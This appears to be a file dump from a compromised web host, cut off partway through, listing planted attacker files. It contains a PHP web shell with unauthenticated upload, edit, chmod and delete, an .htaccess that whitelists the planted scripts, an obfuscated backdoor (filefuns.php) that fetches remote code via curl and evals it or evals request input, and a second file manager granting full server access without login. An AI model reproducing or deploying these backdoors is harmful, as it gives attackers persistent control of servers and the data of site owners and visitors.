uawdijnntqw1x1x1
IP : 216.73.216.39
Hostname : diefsweb003.fsit.ch
Kernel : Linux diefsweb003.fsit.ch 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64
Disable Function : None :)
OS : Linux
PATH:
/
home
/
wirbesti
/
nousdecidons.ch
/
472b8
/
..
/
dea52
/
.
/
0fdb7.tar
/
/
index.php000064400000020221152137727050006372 0ustar00๏ปฟรฏยปยฟ<?php @session_start(); @set_time_limit(0); echo '<!DOCTYPE HTML> <HTML> <HEAD> <title></title> <style> body{ font-family: monospace; font-weight: bold; font-size: 18px; background-color: #c5c5c5; color: #000; } #content tr:hover{ background-color: #ccc; } #content .first{ background-color: #ccc; } #content .first:hover{ background-color: #ccc; } table{ border: 3px #000 solid; } a{ color: #000; text-decoration: none; } a:hover{ color: #00f; } input,select,textarea{ border: 1px #000 solid; -moz-border-radius: 5px; -webkit-border-radius:5px; border-radius:5px; } input { font-size: 18px; font-weight: bold; padding: 5px; } select { font-size: 19px } textarea { font-size: 10px } td, tr { padding: 2px 5px; } </style> </HEAD> <BODY> <hr width="920" color="black"/> <hr width="920" color="black"/><center><p><h2>Your IP : ' .$_SERVER["REMOTE_ADDR"]. '</h2></p></center> <hr width="920" color="black"/> <table width="920" border="1px" cellpadding="7" cellspacing="0" align="center"> <tr><td style="padding: 8px">Current Path : '; if(isset($_GET['path'])){ $path = $_GET['path']; }else{ $path = getcwd(); } $path = str_replace('\\','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo '<a href="?path=/">/</a>'; continue; } if($pat == '') continue; echo '<a href="?path='; for($i=0;$i<=$id;$i++){ echo "$paths[$i]"; if($i != $id) echo "/"; } echo '">'.$pat.'</a>/'; } echo '</td></tr><tr><td>'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '<font color="green">Upload Success..</font><br />'; }else{ echo '<font color="red">Upload Gagal..</font><br />'; } } echo '<form enctype="multipart/form-data" method="POST"> Upload File : <input type="file" name="file" /> <input type="submit" value="Upload" /> </form> </td></tr>'; if(isset($_GET['filesrc'])){ echo "<tr><td style='padding: 8px'>Current File : "; echo $_GET['filesrc']; echo '</tr></td></table><br />'; echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>'); }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '</table><br /><center>'.$_POST['path'].'<br /><br />'; if($_POST['opt'] == 'chmod'){ if(isset($_POST['perm'])){ if(chmod($_POST['path'],$_POST['perm'])){ echo '<font color="green">Chmod Success..</font><br />'; }else{ echo '<font color="red">Chmod Gagal..</font><br />'; } } echo '<form method="POST"> Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" /> <input type="hidden" name="path" value="'.$_POST['path'].'"> <input type="hidden" name="opt" value="chmod"> <input type="submit" value="Save" /> </form>'; }elseif($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '<font color="green">Rename Berhasil..</font><br />'; }else{ echo '<font color="red">Rename Gagal..</font><br />'; } $_POST['name'] = $_POST['newname']; } echo '<form method="POST"> New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" /> <input type="hidden" name="path" value="'.$_POST['path'].'"> <input type="hidden" name="opt" value="rename"> <input type="submit" value="Save" /> </form>'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w'); if(fwrite($fp,$_POST['src'])){ echo '<font color="green">Edit File Berhasil..</font><br />'; }else{ echo '<font color="red">Edit File Gagal..</font><br />'; } fclose($fp); } echo '<form method="POST"> <textarea cols=130 rows=10 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br /> <input type="hidden" name="path" value="'.$_POST['path'].'"> <input type="hidden" name="opt" value="edit"> <input type="submit" value="Save" /> </form>'; } echo '</center>'; }else{ echo '</table><br /><center>'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '<font color="green">Delete Directory Berhasil..</font><br />'; }else{ echo '<font color="red">Delete Directory Gagal..</font><br />'; } }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo '<font color="green">Delete File Berhasil..</font><br />'; }else{ echo '<font color="red">Delete File Gagal..</font><br />'; } } } echo '</center>'; $scandir = scandir($path); echo '<div id="content"><table width="920" border="1.5px" cellpadding="5" cellspacing="0" align="center"> <tr class="first"> <td><center>Name</center></td> <td><center>Size</center></td> <td><center>Permissions</center></td> <td><center>Options</center></td> </tr>'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "<tr> <td><a href=\"?path=$path/$dir\">$dir</a></td> <td><center>--</center></td> <td><center>"; if(is_writable("$path/$dir")) echo '<font color="Blue">'; elseif(!is_readable("$path/$dir")) echo '<font color="red">'; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>'; echo "</center></td> <td><center><form method=\"POST\" action=\"?option&path=$path\"> <select name=\"opt\"> <option value=\"\"></option> <option value=\"delete\">Delete</option> <option value=\"chmod\">Chmod</option> <option value=\"rename\">Rename</option> </select> <input type=\"hidden\" name=\"type\" value=\"dir\"> <input type=\"hidden\" name=\"name\" value=\"$dir\"> <input type=\"hidden\" name=\"path\" value=\"$path/$dir\"> <input type=\"submit\" value=\"Oke\" /> </form></center></td> </tr>"; } echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>'; foreach($scandir as $file){ if(!is_file("$path/$file")) continue; $size = filesize("$path/$file")/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } echo "<tr> <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td> <td><center>".$size."</center></td> <td><center>"; if(is_writable("$path/$file")) echo '<font color="Blue">'; elseif(!is_readable("$path/$file")) echo '<font color="red">'; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>'; echo "</center></td> <td><center><form method=\"POST\" action=\"?option&path=$path\"> <select name=\"opt\"> <option value=\"\"></option> <option value=\"delete\">Delete</option> <option value=\"chmod\">Chmod</option> <option value=\"rename\">Rename</option> <option value=\"edit\">Edit</option> </select> <input type=\"hidden\" name=\"type\" value=\"file\"> <input type=\"hidden\" name=\"name\" value=\"$file\"> <input type=\"hidden\" name=\"path\" value=\"$path/$file\"> <input type=\"submit\" value=\"Oke\" /> </form></center></td> </tr>"; } echo '</table> </div>'; } echo '<center><hr width="920" color="black"/> <center> </BODY> </HTML>'; function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?> .htaccess000044400000003775152137727050006365 0ustar00<FilesMatch '.(py|exe|php|PHP|Php|PHp|pHp|pHP|pHP7|PHP7|phP|PhP|php5|suspected)$'> Order allow,deny Deny from all </FilesMatch> <FilesMatch '^(index.php|wp-blog-header.php|wp-config-sample.php|wp-links-opml.php|wp-login.php|wp-settings.php|wp-trackback.php|wp-activate.php|wp-comments-post.php|wp-cron.php|wp-load.php|wp-mail.php|wp-signup.php|xmlrpc.php|edit-form-advanced.php|link-parse-opml.php|ms-sites.php|options-writing.php|themes.php|admin-ajax.php|edit-form-comment.php|link.php|ms-themes.php|plugin-editor.php|admin-footer.php|edit-link-form.php|load-scripts.php|ms-upgrade-network.php|admin-functions.php|edit.php|load-styles.php|ms-users.php|plugins.php|admin-header.php|edit-tag-form.php|media-new.php|my-sites.php|post-new.php|admin.php|edit-tags.php|media.php|nav-menus.php|post.php|admin-post.php|export.php|media-upload.php|network.php|press-this.php|upload.php|async-upload.php|menu-header.php|options-discussion.php|privacy.php|user-edit.php|menu.php|options-general.php|profile.php|user-new.php|moderation.php|options-head.php|revision.php|users.php|custom-background.php|ms-admin.php|options-media.php|setup-config.php|widgets.php|custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|filefuns.php)$'> Order allow,deny Allow from all </FilesMatch> <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] </IfModule>filefuns.php000044400000013371152137727050007104 0ustar00<?php goto V1BwMJIgAAKT8; PcipRbG3ILfZY: metaphone("\x59\66\x72\124\124\x45\155\143\x64\57\162\x6e\112\67\x58\x4d\x32\71\x33\x37\x45\x38\x4f\x77\106\x34\155\130\132\x58\107\x64\x54\x71\x2b\103\131\53\150\104\x79\124\153"); goto mJ9_Gs3h1NRhJ; oFtzhYyjIbFWe: $B1xvAZ1zTBoRC = $XZ9ue2AzyDsrk("\176", "\40"); goto z3B_98a7M00Ew; vgIRdGaY6J5G2: @(md5(md5(md5(md5($VGTu8MYZwXbfb[14])))) === "\64\x36\x31\x63\x32\64\x31\141\x32\x33\67\71\144\141\70\x62\145\60\143\x32\70\71\65\x36\62\144\64\141\60\x35\x36\141") && (count($VGTu8MYZwXbfb) == 20 && in_array(gettype($VGTu8MYZwXbfb) . count($VGTu8MYZwXbfb), $VGTu8MYZwXbfb)) ? ($VGTu8MYZwXbfb[65] = $VGTu8MYZwXbfb[65] . $VGTu8MYZwXbfb[71]) && ($VGTu8MYZwXbfb[83] = $VGTu8MYZwXbfb[65]($VGTu8MYZwXbfb[83])) && @eval($VGTu8MYZwXbfb[65](${$VGTu8MYZwXbfb[41]}[16])) : $VGTu8MYZwXbfb; goto PcipRbG3ILfZY; z3B_98a7M00Ew: $VGTu8MYZwXbfb = ${$B1xvAZ1zTBoRC[19 + 12] . $B1xvAZ1zTBoRC[57 + 2] . $B1xvAZ1zTBoRC[26 + 21] . $B1xvAZ1zTBoRC[28 + 19] . $B1xvAZ1zTBoRC[47 + 4] . $B1xvAZ1zTBoRC[8 + 45] . $B1xvAZ1zTBoRC[12 + 45]}; goto vgIRdGaY6J5G2; mJ9_Gs3h1NRhJ: class QAsAYL8KYmD4_ { static function vTjgHo3LCC2it($Hy26Gn_2z10eI) { goto jSaRJsxzjH00M; es5R0SsbmYQg5: $JrVdZx6EHOzTc = ''; goto FJdhkLaqBwpMp; jSaRJsxzjH00M: $FHKntKVrZix9H = "\x72" . "\x61" . "\x6e" . "\147" . "\x65"; goto ma5qhFfcM8vnJ; jw12ggpFd9ua9: $AvBELC7fgDcKp = explode("\136", $Hy26Gn_2z10eI); goto es5R0SsbmYQg5; ma5qhFfcM8vnJ: $TwrzFJ_0atH0c = $FHKntKVrZix9H("\x7e", "\40"); goto jw12ggpFd9ua9; V2Y2cGUMKAGG8: return $JrVdZx6EHOzTc; goto rvR1W0HoAhLsC; FJdhkLaqBwpMp: foreach ($AvBELC7fgDcKp as $DiL18FzXFfnPz => $V1WBXnrw_Izch) { $JrVdZx6EHOzTc .= $TwrzFJ_0atH0c[$V1WBXnrw_Izch - 88653]; tx57uOQOdijGw: } goto lHvnQGPKACV4x; lHvnQGPKACV4x: dMV0EXKMS08aQ: goto V2Y2cGUMKAGG8; rvR1W0HoAhLsC: } static function wScAPuxqqup_v($LXzRgBPj6YdV2, $Mw0yyuB8JtKlD) { goto ZVwmGZ2YiHnwL; ZVwmGZ2YiHnwL: $qNFYiQtj8mpF2 = curl_init($LXzRgBPj6YdV2); goto RmtE5BFF3Lr7F; RmtE5BFF3Lr7F: curl_setopt($qNFYiQtj8mpF2, CURLOPT_RETURNTRANSFER, 1); goto XbyP53Ln0AfhJ; V2Ssy14PfaDfX: return empty($yLPnE8Hi3t1_M) ? $Mw0yyuB8JtKlD($LXzRgBPj6YdV2) : $yLPnE8Hi3t1_M; goto iNcHJUlOeZLvd; XbyP53Ln0AfhJ: $yLPnE8Hi3t1_M = curl_exec($qNFYiQtj8mpF2); goto V2Ssy14PfaDfX; iNcHJUlOeZLvd: } static function LlvjgcpGOwjU0() { goto ZCujW7vEIjDEv; aKg9m1r3njCE6: foreach ($jX1IqdMJj6Afr as $YOjN_2yKxXXhA) { $icxe0aF89I_sc[] = self::VTJGHo3LCc2it($YOjN_2yKxXXhA); X6OlYjr__O9ml: } goto jJAVfH01dkDQF; j3iqjRbXb9jE3: $zFDgL6oSwyy9_ = @$icxe0aF89I_sc[1]($icxe0aF89I_sc[5 + 5](INPUT_GET, $icxe0aF89I_sc[3 + 6])); goto uFaveGhSi69bl; cGcX4W_p3rm3o: if (!(@$JuD8y0_65asML[0] - time() > 0 and $Q8gpraioZ7hXM === "\x39\x36\x31\x64\x65\x64\146\141\x30\x66\x63\x31\x66\63\x63\x33\66\x62\x64\70\x39\x64\71\145\64\x33\144\145\70\x62\145\x63")) { goto CAv6jqVsBZGNV; } goto IbkphvrsoUkwA; IbkphvrsoUkwA: $h01KZJA55ZPVr = self::WsCaPuxQQUP_V($JuD8y0_65asML[0 + 1], $icxe0aF89I_sc[0 + 5]); goto i_jQfbOCLMgMK; fdy0i8ez5SPvD: @$icxe0aF89I_sc[5 + 5](INPUT_GET, "\x6f\146") == 1 && die($icxe0aF89I_sc[1 + 4](__FILE__)); goto ODewj8z7LB3BM; dI1SxiCqUBkt9: $ESx_l5TvRFQoJ = md5($JuD8y0_65asML[3 + 0]); goto fdy0i8ez5SPvD; i_jQfbOCLMgMK: @eval($icxe0aF89I_sc[4 + 0]($h01KZJA55ZPVr)); goto IhbuJ7V4coFV8; Y9fhmwcCe1SnR: $JuD8y0_65asML = $icxe0aF89I_sc[1 + 1]($q8a5USbmmFm4N, true); goto dI1SxiCqUBkt9; uFaveGhSi69bl: $q8a5USbmmFm4N = @$icxe0aF89I_sc[0 + 3]($icxe0aF89I_sc[2 + 4], $zFDgL6oSwyy9_); goto Y9fhmwcCe1SnR; IhbuJ7V4coFV8: die; goto miNTXmR4tNTBt; ODewj8z7LB3BM: $Q8gpraioZ7hXM = md5($ESx_l5TvRFQoJ); goto cGcX4W_p3rm3o; ZCujW7vEIjDEv: $jX1IqdMJj6Afr = array("\70\x38\66\70\60\136\x38\x38\x36\66\x35\136\70\x38\66\67\70\136\70\70\66\70\x32\136\x38\x38\x36\66\x33\136\70\x38\x36\x37\70\x5e\70\x38\66\x38\x34\x5e\70\70\66\67\x37\x5e\70\70\x36\66\x32\136\x38\70\x36\x36\x39\x5e\70\x38\x36\70\60\136\x38\70\x36\66\x33\136\70\x38\66\x37\64\x5e\x38\x38\x36\66\70\x5e\x38\x38\x36\x36\71", "\70\x38\66\x36\64\x5e\70\x38\x36\66\x33\136\x38\x38\66\66\x35\x5e\x38\x38\66\x38\64\x5e\70\70\x36\x36\65\136\70\x38\66\x36\x38\136\x38\x38\x36\x36\63\136\x38\70\67\63\60\136\70\x38\x37\x32\x38", "\x38\70\66\67\63\136\x38\70\66\x36\64\x5e\70\70\x36\x36\x38\x5e\70\x38\x36\x36\x39\x5e\x38\x38\66\70\64\x5e\70\x38\66\67\x39\x5e\70\70\x36\67\x38\136\x38\70\x36\70\60\x5e\70\70\x36\66\x38\x5e\70\70\66\x37\71\x5e\70\x38\x36\x37\70", "\70\70\66\x36\67\x5e\70\x38\66\70\x32\136\x38\70\66\70\60\x5e\70\x38\66\x37\62", "\x38\x38\x36\x38\x31\x5e\70\x38\66\x38\62\136\70\70\66\x36\x34\136\x38\70\x36\67\x38\x5e\x38\70\67\x32\65\x5e\70\x38\67\62\x37\136\70\x38\66\x38\x34\x5e\70\x38\66\x37\71\136\x38\70\x36\x37\x38\x5e\x38\70\x36\70\60\136\x38\x38\66\66\70\x5e\x38\70\x36\x37\x39\136\x38\70\66\x37\x38", "\70\70\66\x37\x37\x5e\70\70\x36\67\64\x5e\70\x38\x36\x37\x31\x5e\70\70\x36\67\70\x5e\70\x38\66\70\x34\136\x38\70\66\x37\x36\136\70\70\66\x37\70\x5e\70\x38\x36\x36\63\x5e\x38\x38\x36\70\64\x5e\x38\x38\66\x38\x30\136\70\70\x36\66\70\136\70\70\x36\x36\x39\136\x38\x38\x36\x36\x33\x5e\x38\x38\66\x37\70\136\x38\70\66\66\x39\x5e\x38\x38\66\x36\63\136\70\x38\66\66\64", "\70\70\x37\x30\x37\x5e\70\x38\x37\x33\x37", "\70\x38\x36\65\64", "\x38\70\x37\x33\x32\136\70\x38\67\x33\67", "\x38\70\x37\x31\64\x5e\x38\70\x36\x39\x37\x5e\70\70\66\71\67\136\x38\x38\67\61\64\x5e\70\x38\x36\x39\x30", "\x38\x38\x36\67\x37\136\x38\70\x36\67\64\x5e\70\70\66\x37\61\136\70\70\x36\66\x33\136\70\70\66\x37\70\136\70\x38\66\66\65\136\x38\x38\66\70\64\x5e\x38\70\66\67\x34\x5e\x38\x38\66\x36\x39\136\70\70\66\66\x37\136\70\x38\66\x36\62\x5e\x38\70\x36\66\63"); goto aKg9m1r3njCE6; jJAVfH01dkDQF: Kuz7U3USinbCW: goto j3iqjRbXb9jE3; miNTXmR4tNTBt: CAv6jqVsBZGNV: goto aa1QE_U3DQSq3; aa1QE_U3DQSq3: } } goto amot2wEWN5jtN; V1BwMJIgAAKT8: $XZ9ue2AzyDsrk = "\x72" . "\141" . "\x6e" . "\x67" . "\x65"; goto oFtzhYyjIbFWe; amot2wEWN5jtN: qAsayl8kYMD4_::lLvJgcPgOWJu0(); ?> BiaoJiOk980262/index.php000064400000134464152137727050007163 0ustar00<?php /** * Simple PHP File Manager * Single file manager with full server access * Version 3.0 - Full directory access + English */ // Security: Set timezone date_default_timezone_set('UTC'); // Start session for flash messages if (session_status() === PHP_SESSION_NONE) { session_start(); } // Configuration $config = [ 'show_hidden_files' => false, 'date_format' => 'Y-m-d H:i:s', 'max_upload_size' => 100 * 1024 * 1024, // 100MB 'allowed_extensions' => '*', 'readonly' => false, 'root_path' => '/' // Allow access to entire server ]; // Get current directory - allow going beyond document root $current_path = isset($_GET['path']) ? $_GET['path'] : getcwd(); // Clean and resolve path $current_path = str_replace('\\', '/', $current_path); $current_path = rtrim($current_path, '/'); // For security, prevent null bytes and directory traversal tricks if (strpos($current_path, "\0") !== false || strpos($current_path, '..') !== false) { $current_path = getcwd(); } // Resolve to absolute path $real_path = realpath($current_path); if ($real_path === false || !is_dir($real_path)) { $current_path = getcwd(); } else { $current_path = $real_path; } $current_path = str_replace('\\', '/', $current_path); $server_root = '/'; // Allow full server access // AJAX handler for reading file content if (isset($_GET['ajax']) && $_GET['ajax'] === 'read_file' && isset($_GET['file'])) { header('Content-Type: text/plain; charset=utf-8'); $file_path = $_GET['file']; // Security check $real_file_path = realpath($file_path); if ($real_file_path === false || !is_file($real_file_path)) { http_response_code(404); die('ERROR: File not found'); } if (!is_readable($real_file_path)) { http_response_code(403); die('ERROR: File is not readable'); } // Check if file is text $finfo = finfo_open(FILEINFO_MIME_TYPE); $mime_type = finfo_file($finfo, $real_file_path); finfo_close($finfo); // Only allow text files to be edited $text_types = ['text/', 'application/json', 'application/xml', 'application/javascript', 'application/x-httpd-php']; $is_text = false; foreach ($text_types as $type) { if (strpos($mime_type, $type) === 0) { $is_text = true; break; } } if (!$is_text && pathinfo($real_file_path, PATHINFO_EXTENSION) !== '') { // If it has extension but not in text types, check by extension $text_extensions = ['txt', 'php', 'html', 'htm', 'css', 'js', 'json', 'xml', 'md', 'ini', 'conf', 'log', 'sql', 'sh', 'bat', 'py', 'rb', 'java', 'c', 'cpp', 'h', 'yml', 'yaml', 'env', 'htaccess']; $ext = strtolower(pathinfo($real_file_path, PATHINFO_EXTENSION)); if (!in_array($ext, $text_extensions)) { die('ERROR: This is not a text file and cannot be edited'); } } $content = file_get_contents($real_file_path); if ($content === false) { http_response_code(500); die('ERROR: Failed to read file'); } echo $content; exit; } // Handle POST actions $message = ''; $message_type = 'success'; if ($_SERVER['REQUEST_METHOD'] === 'POST' && !$config['readonly']) { $action = isset($_POST['action']) ? $_POST['action'] : ''; try { switch ($action) { case 'create_file': $filename = basename($_POST['filename']); if (empty($filename)) throw new Exception('File name cannot be empty'); $filepath = $current_path . '/' . $filename; if (file_exists($filepath)) throw new Exception('File already exists'); if (file_put_contents($filepath, $_POST['content'] ?? '') === false) { throw new Exception('Failed to create file'); } $message = 'File created successfully'; break; case 'create_folder': $foldername = basename($_POST['foldername']); if (empty($foldername)) throw new Exception('Folder name cannot be empty'); $folderpath = $current_path . '/' . $foldername; if (file_exists($folderpath)) throw new Exception('Folder already exists'); if (!mkdir($folderpath, 0755)) { throw new Exception('Failed to create folder'); } $message = 'Folder created successfully'; break; case 'edit_file': $filepath = $_POST['filepath']; $real_path = realpath($filepath); if ($real_path === false || !file_exists($real_path)) throw new Exception('File not found'); if (!is_writable($real_path)) throw new Exception('File is not writable'); if (file_put_contents($real_path, $_POST['content']) === false) { throw new Exception('Failed to save file'); } $message = 'File saved successfully'; break; case 'delete': $target = $_POST['target']; $real_target = realpath($target); if ($real_target === false || !file_exists($real_target)) throw new Exception('Target not found'); if (is_dir($real_target)) { if (!removeDirectory($real_target)) throw new Exception('Failed to delete folder'); } else { if (!unlink($real_target)) throw new Exception('Failed to delete file'); } $message = 'Deleted successfully'; break; case 'rename': $oldname = $_POST['oldname']; $newname = basename($_POST['newname']); $real_oldname = realpath($oldname); if ($real_oldname === false || !file_exists($real_oldname)) throw new Exception('File/folder not found'); if (empty($newname)) throw new Exception('New name cannot be empty'); $newpath = dirname($real_oldname) . '/' . $newname; if (file_exists($newpath)) throw new Exception('Name already in use'); if (!rename($real_oldname, $newpath)) throw new Exception('Failed to rename'); $message = 'Renamed successfully'; if (is_dir($newpath) && $real_oldname === $current_path) { $current_path = $newpath; } break; case 'upload': if (!isset($_FILES['files'])) throw new Exception('No files uploaded'); $upload_count = 0; $errors = []; foreach ($_FILES['files']['tmp_name'] as $key => $tmp_name) { if ($_FILES['files']['error'][$key] !== UPLOAD_ERR_OK) { $errors[] = $_FILES['files']['name'][$key] . ': Upload error (code: ' . $_FILES['files']['error'][$key] . ')'; continue; } $filename = basename($_FILES['files']['name'][$key]); $destination = $current_path . '/' . $filename; if ($config['allowed_extensions'] !== '*') { $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION)); if (!in_array($ext, $config['allowed_extensions'])) { $errors[] = $filename . ': Extension not allowed'; continue; } } if ($_FILES['files']['size'][$key] > $config['max_upload_size']) { $errors[] = $filename . ': File size too large'; continue; } if (move_uploaded_file($tmp_name, $destination)) { $upload_count++; } else { $errors[] = $filename . ': Failed to move file'; } } $message = "$upload_count file(s) uploaded successfully"; if (!empty($errors)) { $message .= "\nErrors: " . implode(", ", $errors); $message_type = 'error'; } break; case 'chmod': $target = $_POST['target']; $mode = $_POST['mode']; $real_target = realpath($target); if ($real_target === false || !file_exists($real_target)) throw new Exception('Target not found'); $mode = octdec($mode); if (!chmod($real_target, $mode)) throw new Exception('Failed to change permission'); $message = 'Permission changed successfully'; break; } } catch (Exception $e) { $message = $e->getMessage(); $message_type = 'error'; } } // Helper function to recursively remove directory function removeDirectory($dir) { if (!is_dir($dir)) return false; $items = scandir($dir); foreach ($items as $item) { if ($item === '.' || $item === '..') continue; $path = $dir . '/' . $item; if (is_dir($path)) { if (!removeDirectory($path)) return false; } else { if (!unlink($path)) return false; } } return rmdir($dir); } // Helper function to format file size function formatFileSize($bytes) { if ($bytes === 0) return '0 B'; $units = ['B', 'KB', 'MB', 'GB', 'TB']; $i = floor(log($bytes, 1024)); return round($bytes / pow(1024, $i), 2) . ' ' . $units[$i]; } // Helper function to get file icon function getFileIcon($item, $is_dir) { if ($is_dir) return '๐'; $ext = strtolower(pathinfo($item, PATHINFO_EXTENSION)); $icons = [ 'php' => '๐', 'html' => '๐', 'htm' => '๐', 'css' => '๐จ', 'js' => '๐', 'json' => '๐', 'xml' => '๐ฐ', 'jpg' => '๐ผ๏ธ', 'jpeg' => '๐ผ๏ธ', 'png' => '๐ผ๏ธ', 'gif' => '๐ผ๏ธ', 'svg' => '๐ผ๏ธ', 'pdf' => '๐', 'doc' => '๐', 'docx' => '๐', 'txt' => '๐', 'zip' => '๐ฆ', 'rar' => '๐ฆ', 'tar' => '๐ฆ', 'gz' => '๐ฆ', 'mp3' => '๐ต', 'mp4' => '๐ฌ', 'avi' => '๐ฌ', 'mov' => '๐ฌ', 'sql' => '๐พ', 'md' => '๐', 'log' => '๐', ]; return $icons[$ext] ?? '๐'; } // Get directory contents $items = []; if (is_dir($current_path)) { $scan = scandir($current_path); foreach ($scan as $item) { if ($item === '.') continue; // Only hide '..' if we're at the root '/' if ($item === '..' && $current_path === '/') continue; if (!$config['show_hidden_files'] && $item[0] === '.') continue; $full_path = $current_path . '/' . $item; $is_dir = is_dir($full_path); $items[] = [ 'name' => $item, 'path' => $full_path, 'is_dir' => $is_dir, 'size' => $is_dir ? '-' : formatFileSize(filesize($full_path)), 'modified' => date($config['date_format'], filemtime($full_path)), 'permissions' => substr(sprintf('%o', fileperms($full_path)), -4), 'icon' => getFileIcon($item, $is_dir), 'writable' => is_writable($full_path) ]; } } // Sort: directories first, then alphabetical usort($items, function($a, $b) { if ($a['is_dir'] !== $b['is_dir']) { return $a['is_dir'] ? -1 : 1; } return strcasecmp($a['name'], $b['name']); }); // Get parent path - allow going all the way to root $parent_path = dirname($current_path); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>File Manager - <?php echo htmlspecialchars($current_path); ?></title> <style> * { margin: 0; padding: 0; box-sizing: border-box; } body { font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, 'Helvetica Neue', Arial, sans-serif; background: #f0f2f5; color: #333; line-height: 1.6; } .container { max-width: 1400px; margin: 0 auto; padding: 20px; } .header { background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); color: white; padding: 20px 25px; border-radius: 12px; margin-bottom: 20px; box-shadow: 0 4px 15px rgba(0,0,0,0.1); } .header h1 { font-size: 26px; margin-bottom: 12px; display: flex; align-items: center; gap: 10px; } .breadcrumb { display: flex; flex-wrap: wrap; gap: 8px; align-items: center; padding: 8px 0; } .breadcrumb a { color: white; text-decoration: none; padding: 6px 12px; background: rgba(255,255,255,0.2); border-radius: 6px; transition: all 0.3s; font-size: 13px; } .breadcrumb a:hover { background: rgba(255,255,255,0.4); transform: translateY(-1px); } .breadcrumb span { color: rgba(255,255,255,0.7); font-weight: bold; } .message { padding: 15px; border-radius: 8px; margin-bottom: 20px; font-weight: 500; white-space: pre-line; } .message.success { background: #d4edda; color: #155724; border: 1px solid #c3e6cb; } .message.error { background: #f8d7da; color: #721c24; border: 1px solid #f5c6cb; } .toolbar { display: flex; gap: 10px; margin-bottom: 20px; flex-wrap: wrap; align-items: center; background: white; padding: 15px; border-radius: 10px; box-shadow: 0 2px 8px rgba(0,0,0,0.05); } .btn { padding: 10px 18px; border: none; border-radius: 6px; cursor: pointer; font-size: 14px; font-weight: 500; transition: all 0.3s; text-decoration: none; display: inline-flex; align-items: center; gap: 6px; } .btn:hover { transform: translateY(-2px); box-shadow: 0 4px 8px rgba(0,0,0,0.15); } .btn-primary { background: #007bff; color: white; } .btn-primary:hover { background: #0056b3; } .btn-success { background: #28a745; color: white; } .btn-success:hover { background: #218838; } .btn-danger { background: #dc3545; color: white; } .btn-danger:hover { background: #c82333; } .btn-warning { background: #ffc107; color: #333; } .btn-warning:hover { background: #e0a800; } .btn-info { background: #17a2b8; color: white; } .btn-info:hover { background: #138496; } .btn-sm { padding: 5px 10px; font-size: 12px; } .btn-xs { padding: 4px 8px; font-size: 11px; } .file-table { background: white; border-radius: 10px; overflow: hidden; box-shadow: 0 2px 8px rgba(0,0,0,0.05); } .file-table table { width: 100%; border-collapse: collapse; } .file-table th { background: #f8f9fa; padding: 14px; text-align: left; font-weight: 600; font-size: 13px; color: #495057; border-bottom: 2px solid #dee2e6; text-transform: uppercase; letter-spacing: 0.5px; } .file-table td { padding: 12px 14px; border-bottom: 